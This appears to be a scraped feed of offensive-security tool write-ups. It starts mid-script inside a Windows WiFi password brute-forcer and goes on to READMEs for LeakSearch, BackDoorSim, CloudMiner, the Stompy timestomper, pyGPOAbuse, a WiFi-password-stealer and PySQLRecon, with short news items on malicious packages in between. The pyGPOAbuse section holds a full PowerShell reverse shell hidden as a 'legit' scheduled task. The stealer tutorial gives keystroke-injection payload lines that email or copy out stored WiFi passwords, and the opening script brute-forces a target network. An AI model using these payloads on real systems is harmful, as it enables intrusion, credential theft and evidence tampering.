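      <protected>false</protected>
      <keyMaterial>{password}</keyMaterial>
    </sharedKey>
  </security></MSM>
</WLANProfile>"""

def try_password(interface, ssid, password):
    # Write a temporary profile XML for this candidate password.
    with tempfile.NamedTemporaryFile("w", suffix=".xml", delete=False) as f:
        f.write(PROFILE.format(ssid=ssid, password=password))
        profile = f.name
    # Register the profile and attempt the connection with netsh.
    subprocess.run(["netsh", "wlan", "add", "profile", f"filename={profile}",
                    f"interface={interface}"], capture_output=True)
    subprocess.run(["netsh", "wlan", "connect", f"name={ssid}",
                    f"interface={interface}"], capture_output=True)
    time.sleep(5)  # give the connection attempt a few seconds before testing
    # "1 packet ping" to Google as the success check.
    ping = subprocess.run(["ping", "-n", "1", "google.com"], capture_output=True)
    return ping.returncode == 0

with open("./wordlist/default.txt", encoding="utf-8", errors="ignore") as wl:
    for candidate in (line.strip() for line in wl):
        if candidate and try_password("Wi-Fi", "TargetSSID", candidate):
            print("Password found:", candidate)
            break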

    How to run this

After installing all the packages, just run python main.py; the rest is history πŸ‘. Make sure you run this on Windows, because it won't work on any other OS. The interface looks like this:



    Contributions

For contributions:
• First Clone: First clone the repo into your dev environment and make your edits.
• Comments: I would appreciate it if you could add comments explaining your POV and also explaining the upgrade.
• Submit: Submit a PR for me to verify the changes and approve it if necessary.



    LeakSearch - Search & Parse Password Leaks

    By: Zion3R


    LeakSearch is a simple tool to search and parse plain text passwords using ProxyNova COMB (Combination Of Many Breaches) over the Internet. You can define a custom proxy and you can also use your own password file, to search using different keywords: such as user, domain or password.

    In addition, you can define how many results you want to display on the terminal and export them as JSON or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.
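
As a rough illustration of what the LocalDataBase option does (a sketch only; LeakSearch's own parsing may differ, and the filename below is a placeholder), searching a local plain-text leak file for a keyword could look like:

# Search a local plain-text leak file (one "user:password"-style entry per line)
# for a keyword such as a user, domain or password fragment.
keyword = "example.com"
with open("LocalDataBase.txt", encoding="utf-8", errors="ignore") as db:  # placeholder filename
    hits = [line.strip() for line in db if keyword.lower() in line.lower()]
for hit in hits[:20]:  # LeakSearch shows 20 results by default
    print(hit)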


    Requirements
    • Python 3
    • Install requirements

    Download

    It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

    git clone https://github.com/JoelGMSec/LeakSearch

    Usage
[LeakSearch ASCII art banner]

    ------------------- by @JoelGMSec -------------------

    usage: LeakSearch.py [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]

    options:
    -h, --help show this help message and exit
    -d DATABASE, --database DATABASE
    Database used for the search (ProxyNova or LocalDataBase)
    -k KEYWORD, --keyword KEYWORD
    Keyword (user/domain/pass) to search for leaks in the DB
    -n NUMBER, --number NUMBER
    Number of results to show (default is 20)
    -o OUTPUT, --output OUTPUT
    Save the results as json or txt into a file
    -p PROXY, --proxy PROXY
    Set HTTP/S proxy (like http://localhost:8080)


    The detailed guide of use can be found at the following link:

    https://darkbyte.net/buscando-y-filtrando-contrasenas-con-leaksearch


    License

    This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.


    Credits and Acknowledgments

    This tool has been created and designed from scratch by Joel GΓ‘mez Molina (@JoelGMSec).


    Contact

    This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

    For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



    Lazarus Exploits Typos to Sneak PyPI Malware into Dev Systems

The notorious North Korean state-backed hacking group Lazarus uploaded four packages to the Python Package Index (PyPI) repository with the goal of infecting developer systems with malware. The packages, now taken down, are pycryptoenv, pycryptoconf, quasarlib, and swapmempool. They have been collectively downloaded 3,269 times, with pycryptoconf accounting for the most

    Huntr-Com-Bug-Bounties-Collector - Keep Watching New Bug Bounty (Vulnerability) Postings

    By: Zion3R


    New bug bounty (vulnerability) collector


    Requirements
    • Chrome with GUI (If you encounter trouble with script execution, check the status of VMs GPU features, if available.)
    • Chrome WebDriver

    Preview
    # python3 main.py

    *2024-02-20 16:14:47.836189*

    1. Arbitrary File Reading due to Lack of Input Filepath Validation
    - Feb 6th 2024 / High (CVE-2024-0964)
    - gradio-app/gradio
    - https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741/

    2. View Barcode Image leads to Remote Code Execution
    - Jan 31st 2024 / Critical (CVE: Not yet)
    - dolibarr/dolibarr
    - https://huntr.com/bounties/f0ffd01e-8054-4e43-96f7-a0d2e652ac7e/

    (delimiter-based file database)

    # vim feeds.db

    1|2024-02-20 16:17:40.393240|7fe14fd58ca2582d66539b2fe178eeaed3524342|CVE-2024-0964|https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741/
    2|2024-02-20 16:17:40.393987|c6b84ac808e7f229a4c8f9fbd073b4c0727e07e1|CVE: Not yet|https://huntr.com/bounties/f0ffd01e-8054-4e43-96f7-a0d2e652ac7e/
    3|2024-02-20 16:17:40.394582|7fead9658843919219a3b30b8249700d968d0cc9|CVE: Not yet|https://huntr.com/bounties/d6cb06dc-5d10-4197-8f89-847c3203d953/
    4|2024-02-20 16:17:40.395094|81fecdd74318ce7da9bc29e81198e62f3225bd44|CVE: Not yet|https://huntr.com/bounties/d875d1a2-7205-4b2b-93cf-439fa4c4f961/
    5|2024-02-20 16:17:40.395613|111045c8f1a7926174243db403614d4a58dc72ed|CVE: Not yet|https://huntr.com/bounties/10e423cd-7051-43fd-b736-4e18650d0172/
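    Because feeds.db is just a pipe-delimited text file, it can be inspected with a few lines of Python. The sketch below is not part of the collector itself; it simply assumes the five columns visible in the sample above (id, timestamp, hash, CVE field, URL).

    # Parse the pipe-delimited feeds.db shown above (column layout assumed from the sample)
    with open("feeds.db", encoding="utf-8") as db:
        for line in db:
            line = line.strip()
            if not line:
                continue
            entry_id, timestamp, digest, cve, url = line.split("|", 4)
            print(f"[{entry_id}] {cve:<12} {url}")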

    Notes
    • This code is designed to parse HTML elements from huntr.com, so it may not function correctly if the HTML page structure changes.
    • In case of errors during parsing, exception handling has been included, so if it doesn't work as expected, please inspect the HTML source for any changes.
    • If get in trouble In a typical cloud environment, scripts may not function properly within virtual machines (VMs).


    North Korean Hackers Targeting Developers with Malicious npm Packages

    A set of fake npm packages discovered on the Node.js repository has been found to share ties with North Korean state-sponsored actors, new findings from Phylum show. The packages are named execution-time-async, data-time-utils, login-time-utils, mongodb-connection-utils, and mongodb-execution-utils. One of the packages in question, execution-time-async, masquerades as its legitimate

    BackDoorSim - An Educational Introduction To Remote Administration Tools

    By: Zion3R


    BackdoorSim is a remote administration and monitoring tool designed for educational and testing purposes. It consists of two main components: ControlServer and BackdoorClient. The server controls the client, allowing for various operations like file transfer, system monitoring, and more.


    Disclaimer

    This tool is intended for educational purposes only. Misuse of this software can violate privacy and security policies. The developers are not responsible for any misuse or damage caused by this software. Always ensure you have permission to use this tool in your intended environment.


    Features
    • File Transfer: Upload and download files between server and client.
    • Screenshot Capture: Take screenshots from the client's system.
    • System Information Gathering: Retrieve detailed system and security software information.
    • Camera Access: Capture images from the client's webcam.
    • Notifications: Send and display notifications on the client system.
    • Help Menu: Easy access to command information and usage.

    Installation

    To set up BackdoorSim, you will need to install it on both the server and client machines.

    1. Clone the repository:

       $ git clone https://github.com/HalilDeniz/BackDoorSim.git

    2. Navigate to the project directory:

       $ cd BackDoorSim

    3. Install the required dependencies:

       $ pip install -r requirements.txt


    Usage

    After starting both the server and client, you can use the following commands in the server's command prompt:

    • upload [file_path]: Upload a file to the client.
    • download [file_path]: Download a file from the client.
    • screenshot: Capture a screenshot from the client.
    • sysinfo: Get system information from the client.
    • securityinfo: Get security software status from the client.
    • camshot: Capture an image from the client's webcam.
    • notify [title] [message]: Send a notification to the client.
    • help: Display the help menu.

    Disclaimer

    BackDoorSim is developed for educational purposes only. The creators of BackDoorSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.


    DepNot: RansomwareSim

    If you are interested in tools like BackdoorSim, be sure to check out my recently released RansomwareSim tool


    BackdoorSim: An Educational Introduction to Remote Administration Tools

    If you want to read our article about BackdoorSim


    Contributing

    Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions.

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.


    Contact

    For any inquiries or further information, you can reach me through the following channels:



    Dormant PyPI Package Compromised to Spread Nova Sentinel Malware

    A dormant package available on the Python Package Index (PyPI) repository was updated nearly two years later to propagate an information stealer malware called Nova Sentinel. The package, named django-log-tracker, was first published to PyPI in April 2022, according to software supply chain security firm Phylum, which detected an anomalous update to the library on February 21,

    SpeedyTest - Command-Line Tool For Measuring Internet Speed

    By: Zion3R


    SpeedyTest is a powerful command-line tool for measuring internet speed. With its advanced features and intuitive interface, it provides accurate and comprehensive speed test results. Whether you're a network administrator, developer, or simply want to monitor your internet connection, SpeedyTest is the perfect tool for the job.


    Features
    • Measure download speed, upload speed, and ping latency.
    • Generate detailed reports with graphical representation of speed test results.
    • Save and export test results in various formats (CSV, JSON, etc.).
    • Customize speed test parameters and server selection.
    • Compare speed test results over time to track performance changes.
    • Integrate SpeedyTest into your own applications using the provided API.
    • track your timeline with saved database

    Installation
    git clone https://github.com/HalilDeniz/SpeedyTest.git

    Requirements

    Before you can use SpeedyTest, you need to make sure that you have the necessary requirements installed. You can install these requirements by running the following command:

    pip install -r requirements.txt

    Usage

    Run the following command to perform a speed test:

    python3 speendytest.py

    Visual Output



    Output
    Receiving data \
    Speed test completed!
    Speed test time: 20.22 seconds
    Server    : Farknet - Konya
    IP Address: speedtest.farknet.com.tr:8080
    Country   : Turkey
    City      : Konya
    Ping      : 20.41 ms
    Download  : 90.12 Mbps
    Upload    : 20 Mbps
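    The README does not show SpeedyTest's internals, but comparable numbers can be produced with the third-party speedtest-cli package (pip install speedtest-cli). The sketch below is a generic illustration under that assumption, not SpeedyTest's own implementation.

    import speedtest  # third-party package speedtest-cli (an assumption, not necessarily what SpeedyTest uses)

    st = speedtest.Speedtest()
    st.get_best_server()                       # pick the lowest-latency server
    download_mbps = st.download() / 1_000_000  # results are reported in bits per second
    upload_mbps = st.upload() / 1_000_000
    ping_ms = st.results.ping

    print(f"Ping     : {ping_ms:.2f} ms")
    print(f"Download : {download_mbps:.2f} Mbps")
    print(f"Upload   : {upload_mbps:.2f} Mbps")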







    Contributing

    Contributions are welcome! To contribute to SpeedyTest, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.

    Contact

    If you have any questions, comments, or suggestions about SpeedyTest, please feel free to contact me:


    License

    SpeedyTest is released under the MIT License. See LICENSE for details.



    New Malicious PyPI Packages Caught Using Covert Side-Loading Tactics

    Cybersecurity researchers have discovered two malicious packages on the Python Package Index (PyPI) repository that were found leveraging a technique called DLL side-loading to circumvent detection by security software and run malicious code. The packages, named NP6HelperHttptest and NP6HelperHttper, were downloaded 537 and 166 times, respectively,

    MrHandler - Linux Incident Response Reporting

    By: Zion3R



    MR.Handler is a specialized tool designed for responding to security incidents on Linux systems. It connects to target systems via SSH to execute a range of diagnostic commands, gathering crucial information such as network configurations, system logs, user accounts, and running processes. At the end of its operation, the tool compiles all the gathered data into a comprehensive HTML report. This report details both the specifics of the incident response process and the current state of the system, enabling security analysts to more effectively assess and respond to incidents.



    π—œπ—‘π—¦π—§π—”π—Ÿπ—Ÿπ—”π—§π—œπ—’π—‘ π—œπ—‘π—¦π—§π—₯π—¨π—–π—§π—œπ—’π—‘π—¦
    $ pip3 install colorama
    $ pip3 install paramiko
    $ git clone https://github.com/emrekybs/BlueFish.git
    $ cd MrHandler
    $ chmod +x MrHandler.py
    $ python3 MrHandler.py


    Report



    CloudMiner - Execute Code Using Azure Automation Service Without Getting Charged

    By: Zion3R


    Execute code within Azure Automation service without getting charged

    Description

    CloudMiner is a tool designed to get free computing power within Azure Automation service. The tool utilizes the upload module/package flow to execute code which is totally free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.

    • This flow was reported to Microsoft on 3/23 which decided to not change the service behavior as it's considered as "by design". As for 3/9/23, this tool can still be used without getting charged.

    • Each execution is limited to 3 hours


    Requirements

    1. Python 3.8+ with the libraries mentioned in the file requirements.txt
    2. Configured Azure CLI - https://learn.microsoft.com/en-us/cli/azure/install-azure-cli
      • Account must be logged in before using this tool

    Installation

    pip install .

    Usage

    usage: cloud_miner.py [-h] --path PATH --id ID -c COUNT [-t TOKEN] [-r REQUIREMENTS] [-v]

    CloudMiner - Free computing power in Azure Automation Service

    optional arguments:
      -h, --help            show this help message and exit
      --path PATH           the script path (Powershell or Python)
      --id ID               id of the Automation Account - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/automationAccounts/{automationAccountName}
      -c COUNT, --count COUNT
                            number of executions
      -t TOKEN, --token TOKEN
                            Azure access token (optional). If not provided, token will be retrieved using the Azure CLI
      -r REQUIREMENTS, --requirements REQUIREMENTS
                            Path to requirements file to be installed and used by the script (relevant to Python scripts only)
      -v, --verbose         Enable verbose mode

    Example usage

    Python

    Powershell

    License

    CloudMiner is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.

    Author - Ariel Gamrian



    Stompy - Timestomp Tool To Flatten MAC Times With A Specific Timestamp

    By: Zion3R


    A PowerShell function to perform timestomping on specified files and directories. The function can modify timestamps recursively for all files in a directory.

    • Change timestamps for individual files or directories.
    • Recursively apply timestamps to all files in a directory.
    • Option to use specific credentials for remote paths or privileged files.

    I've ported Stompy to C#, Python and Go and the relevant versions are linked in this repo with their own readme.

    Usage

    • -Path: The path to the file or directory whose timestamps you wish to modify.
    • -NewTimestamp: The new DateTime value you wish to set for the file or directory.
    • -Credentials: (Optional) If you need to specify a different user's credentials.
    • -Recurse: (Switch) If specified, apply the timestamp recursively to all files in the given directory.

    Usage Examples

    Specify the -Recurse switch to apply timestamps recursively:

    1. Change the timestamp of an individual file:
       Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM"
    2. Recursively change timestamps for all files in a directory:
       Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM" -Recurse
    3. Use specific credentials:

    Uscrapper - Powerful OSINT Webscraper For Personal Data Collection

    By: Zion3R


    Introducing Uscrapper 2.0, a powerful OSINT web scraper that allows users to extract various kinds of personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the page, and supports multithreading to make this process faster. Uscrapper 2.0 is equipped with advanced anti-web-scraping bypass modules and supports web crawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.


    Extracted Details:

    Uscrapper extracts the following details from the provided website:

    • Email Addresses: Displays email addresses found on the website.
    • Social Media Links: Displays links to various social media platforms found on the website.
    • Author Names: Displays the names of authors associated with the website.
    • Geolocations: Displays geolocation information associated with the website.
    • Non-Hyperlinked Details: Displays non-hyperlinked details found on the website including email addresses phone numbers and usernames.

    What's New?:

    Uscrapper 2.0:

    • Introduced multiple modules to bypass anti-webscrapping techniques.
    • Introducing Crawl and scrape: an advanced crawl and scrape module to scrape the websites from within.
    • Implemented Multithreading to make these processes faster.

    Installation Steps:

    git clone https://github.com/z0m31en7/Uscrapper.git
    cd Uscrapper/install/ 
    chmod +x ./install.sh && ./install.sh #For Unix/Linux systems

    Usage:

    To run Uscrapper, use the following command-line syntax:

    python Uscrapper-v2.0.py [-h] [-u URL] [-c (INT)] [-t THREADS] [-O] [-ns]


    Arguments:

    • -h, --help: Show the help message and exit.
    • -u URL, --url URL: Specify the URL of the website to extract details from.
    • -c INT, --crawl INT: Specify the number of links to crawl
    • -t INT, --threads INT: Specify the number of threads to use while crawling and scraping.
    • -O, --generate-report: Generate a report file containing the extracted details.
    • -ns, --nonstrict: Display non-strict usernames during extraction.

    Note:

    • Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.

    • The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.

    • To bypass some Anti-Webscrapping methods we have used selenium which can make the overall process slower.

    Contribution:

    Want a new feature to be added?

    • Make a pull request with all the necessary details and it will be merged after a review.
    • You can contribute by making the regular expressions more efficient and accurate, or by suggesting some more features that can be added.


    pyGPOAbuse - Partial Python Implementation Of SharpGPOAbuse

    By: Zion3R


    Partial Python implementation of SharpGPOAbuse by @pkb1s

    This tool can be used when a controlled account can modify an existing GPO that applies to one or more users & computers. It will create an immediate scheduled task as SYSTEM on the remote computer for a computer GPO, or as the logged-in user for a user GPO.

    Default behavior adds a local administrator.


    How to use

    Basic usage

    Add john user to local administrators group (Password: H4x00r123..)

    ./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"

    Advanced usage

    Reverse shell example

    ./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ 
    -powershell \
    -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \
    -taskname "Completely Legit Task" \
    -description "Dis is legit, pliz no delete" \
    -user

    Credits



    WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

    By: Zion3R


    Have you ever watched a film where a hacker plugs a seemingly ordinary USB drive into a victim's computer and steals data from it? - A proper wet dream for some.

    Disclaimer: All content in this project is intended for security research purpose only.


    Introduction

    During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

    Setup

    After creating pico-ducky, you only need to copy the modified payload (adjusted with your SMTP details for the Windows exploit and/or with the Linux password and USB drive name for the Linux exploit) to the RPi Pico.

    Prerequisites

    • Physical access to victim's computer.

    • Unlocked victim's computer.

    • Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

    • Knowledge of victim's computer password for the Linux exploit.

    Requirements - What you'll need


    • Raspberry Pi Pico (RPi Pico)
    • Micro USB to USB Cable
    • Jumper Wire (optional)
    • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
    • USB flash drive (for the exploit over physical medium only)


    Note:

    • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

    • However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.

    • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

    Keystroke injection tool

    A keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

    Keystroke injection

    The payload uses the STRING command to process keystrokes for injection. It accepts one or more alphanumeric/punctuation characters and types the remainder of the line exactly as-is into the target machine. ENTER/SPACE simulate presses of the corresponding keyboard keys.

    Delays

    We use the DELAY command to temporarily pause execution of the payload. This is useful when the payload needs to wait for an element such as a command line to load. A delay is especially useful at the very beginning, when a new USB device is connected to the targeted computer: the computer must complete a set of actions before it can begin accepting input. In the case of HIDs the setup time is very short; in most cases it takes a fraction of a second, because the drivers are built-in. However, in some instances a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

    Exfiltration

    Data exfiltration is the unauthorized transfer of data from a computer/device. Once the data is collected, an adversary can package it, using encryption or compression, to avoid detection while sending it over the network. The two most common ways of exfiltration are:

    • Exfiltration over the network medium.
      • This approach was used for the Windows exploit. The whole payload can be seen here.

    • Exfiltration over a physical medium.
      • This approach was used for the Linux exploit. The whole payload can be seen here.

    Windows exploit

    In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

    Sending stolen data over email

    Once the passwords have been exported to the .txt file, the payload will send the data to the appointed email address using Yahoo SMTP. For more detailed instructions visit the following link. The payload template also needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and your email PASSWORD. In addition, you could also update the body and the subject of the email.

    STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

     Note:

    • After sending data over the email, the .txt file is deleted.

    • You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.

    • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

    Linux exploit

    In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

    Storing stolen data to USB flash drive

    Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

    STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

    STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

    In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

    STRING echo PASSWORD | sudo -S echo

    STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

    Bash script

    In order to run the wifi_passwords_print.sh script you will need to update it with the correct name of your USB stick, after which you can type the following command in your terminal:

    echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

    where PASSWORD is your account's password and USBSTICK is the name for your USB device.

    Quick overview of the payload

    NetworkManager is based on the concept of connection profiles and uses plugins for reading/writing data. The keyfile plugin uses an .ini-style keyfile format to store network configuration profiles; it supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with a regex in order to extract the data of interest. For filtering, a modified positive lookbehind assertion ((?<=keyword)) was used. A positive lookbehind assertion matches at a position right after the keyword without making the keyword itself part of the match, so the regex (?<=keyword).* matches any text that follows the keyword. This allows the payload to match the values after the SSID and psk (pre-shared key) keywords.
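    The lookbehind extraction described above can be reproduced in a few lines of Python. This is only a simplified sketch against an inline sample string; the payload itself uses grep as shown earlier.

    import re

    # Minimal stand-in for a NetworkManager keyfile
    keyfile = "ssid=WLAN1\npsk=pass1\n"

    ssid = re.search(r"(?<=ssid=).*", keyfile).group()  # text right after "ssid=", keyword excluded from the match
    psk = re.search(r"(?<=psk=).*", keyfile).group()    # text right after "psk="
    print(f"{ssid} \t {psk}")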

    For more information about NetworkManager, here are some useful links:

    Exfiltrated data formatting

    Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

    Wireless_Network_Name Password
    --------------------- --------
    WLAN1 pass1
    WLAN2 pass2
    WLAN3 pass3

    USB Mass Storage Device Problem

    One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in; the machine sees it only as a USB keyboard. This isn't the default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

    ο’‘ Tip:

    • Upload your payload to RPi Pico before you connect the pins.
    • Don't solder the pins because you will probably want to change/update the payload at some point.

    Payload Writer

    When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, the name of the OS (windows or linux) and the name of the payload file (e.g. payload1.dd). Below you can find an example of how to run the writer script when creating a Windows payload.

    python3 writer.py windows payload1.dd

    Limitations/Drawbacks

    • This pico-ducky currently works only on Windows OS.

    • This attack requires physical access to an unlocked device in order to be successfully deployed.

    • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.

    • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

    • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

    • The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.

    • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

    • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

    • If the computer has a non-English Environment set, this exploit won't be successful.

    • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

    To-Do List

    • Fix Caps Lock bug.
    • Fix non-English Environment bug.
    • Obfuscate the command prompt.
    • Implement exfiltration over a physical medium.
    • Create a payload for Linux.
    • Encode/Encrypt exfiltrated data before sending it over email.
    • Implement indicator of successfully completed exploit.
    • Implement command history clean-up for Linux exploit.
    • Enhance the Linux exploit in order to avoid usage of sudo.


    Pantheon - Insecure Camera Parser

    By: Zion3R


    Pantheon is a GUI application that allows users to display information regarding network cameras in various countries as well as an integrated live-feed for non-protected cameras.

    Functionalities

    Pantheon allows users to execute an API crawler. There was originally functionality that did not rely on any APIs (like Insecam), but Google's TOS kept getting in the way of the original scraping mechanism.


    Installation

    1. git clone https://github.com/josh0xA/Pantheon.git
    2. cd Pantheon
    3. pip3 install -r requirements.txt
      Execution: python3 pantheon.py
    • Note: I will later add a GUI installer to make it fully indepenent of a CLI

    Windows

    • You can just follow the steps above or download the official package here.
    • Note, the PE binary of Pantheon was put together using pyinstaller, so Windows Defender might get a bit upset.

    Ubuntu

    • First, complete steps 1, 2 and 3 listed above.
    • chmod +x distros/ubuntu_install.sh
    • ./distros/ubuntu_install.sh

    Debian and Kali Linux

    • First, complete steps 1, 2 and 3 listed above.
    • chmod +x distros/debian-kali_install.sh
    • ./distros/debian-kali_install.sh

    MacOS

    • The regular installation steps above should suffice. If not, open up an issue.

    Usage

    (Enter) on a selected IP:Port to establish a Pantheon webview of the camera. (Use this at your own risk)

    (Left-click) on a selected IP:Port to view the geolocation of the camera.
    (Right-click) on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click for Mac).

    Adjust the map as you please to see the markers.

    • Also note that this app is far from perfect and not every link that shows up is a live-feed, some are login pages (Do NOT attempt to login).

    Ethical Notice

    The developer of this program, Josh Schiavone, is not responsible for misuse of this data gathering tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected - that is illegal. Furthermore, if you do choose to use Pantheon to view a live feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit: https://joshschiavone.com/panth_info/panth_ethical_notice.html

    Licence

    MIT License
    Copyright (c) Josh Schiavone



    PySQLRecon - Offensive MSSQL Toolkit Written In Python, Based Off SQLRecon

    By: Zion3R


    PySQLRecon is a Python port of the awesome SQLRecon project by @sanjivkawa. See the commands section for a list of capabilities.


    Install

    PySQLRecon can be installed with pip3 install pysqlrecon or by cloning this repository and running pip3 install .

    Commands

    All of the main modules from SQLRecon have equivalent commands. Commands noted with [PRIV] require elevated privileges or sysadmin rights to run. Alternatively, commands marked with [NORM] can likely be run by normal users and do not require elevated privileges.

    Support for impersonation ([I]) or execution on linked servers ([L]) are denoted at the end of the command description.

    adsi          [PRIV] Obtain ADSI creds from ADSI linked server [I,L]
    agentcmd      [PRIV] Execute a system command using agent jobs [I,L]
    agentstatus   [PRIV] Enumerate SQL agent status and jobs [I,L]
    checkrpc      [NORM] Enumerate RPC status of linked servers [I,L]
    clr           [PRIV] Load and execute .NET assembly in a stored procedure [I,L]
    columns       [NORM] Enumerate columns within a table [I,L]
    databases     [NORM] Enumerate databases on a server [I,L]
    disableclr    [PRIV] Disable CLR integration [I,L]
    disableole    [PRIV] Disable OLE automation procedures [I,L]
    disablerpc    [PRIV] Disable RPC and RPC Out on linked server [I]
    disablexp     [PRIV] Disable xp_cmdshell [I,L]
    enableclr     [PRIV] Enable CLR integration [I,L]
    enableole     [PRIV] Enable OLE automation procedures [I,L]
    enablerpc     [PRIV] Enable RPC and RPC Out on linked server [I]
    enablexp      [PRIV] Enable xp_cmdshell [I,L]
    impersonate   [NORM] Enumerate users that can be impersonated
    info          [NORM] Gather information about the SQL server
    links         [NORM] Enumerate linked servers [I,L]
    olecmd        [PRIV] Execute a system command using OLE automation procedures [I,L]
    query         [NORM] Execute a custom SQL query [I,L]
    rows          [NORM] Get the count of rows in a table [I,L]
    search        [NORM] Search a table for a column name [I,L]
    smb           [NORM] Coerce NetNTLM auth via xp_dirtree [I,L]
    tables        [NORM] Enumerate tables within a database [I,L]
